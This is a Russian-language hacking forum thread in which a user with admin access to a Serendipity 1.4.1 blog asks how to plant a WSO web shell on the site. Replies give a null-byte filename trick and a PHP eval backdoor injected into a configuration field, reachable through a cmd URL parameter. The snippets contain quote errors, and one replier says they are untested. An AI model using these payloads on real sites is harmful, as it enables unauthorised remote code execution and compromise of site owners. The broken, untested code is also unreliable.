Заливка веб-шелла через админку

Доброго времени суток.
Есть доступ в админку Serendipity 1.4.1.
Нету возможгости заливать "активные файлы".
Перепробовал кучу вариантов с нуль-байтом, кавычками и тп.
Не вышло.

Смог залить запакованую версию wso.php.gz

Есть какой нить вариант залить рабочий шелл?

 

Пробуй через конфиг:
eval(stripslashes($_POST[cmd']));

 

wso.php%00.gz --> wso.php

сорь не уследил за твойм текстом, про нул байт.

 

Нету доступа к консоле. Есть только доступ в админку блога на сайте.

 

Через админку:
Adminstration => Configuration
Там много параметров, в одну "маловажную" ставишь свой шелл-код, в нашем случае:
eval(stripslashes($_GET[cmd']));
Потом, по идее, шелл должен быть по адресу:
http://site.ru/serendipity_config_local.inc.php?cmd=phpinfo();

P.S. Не тестил =)

 

Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 4 символов.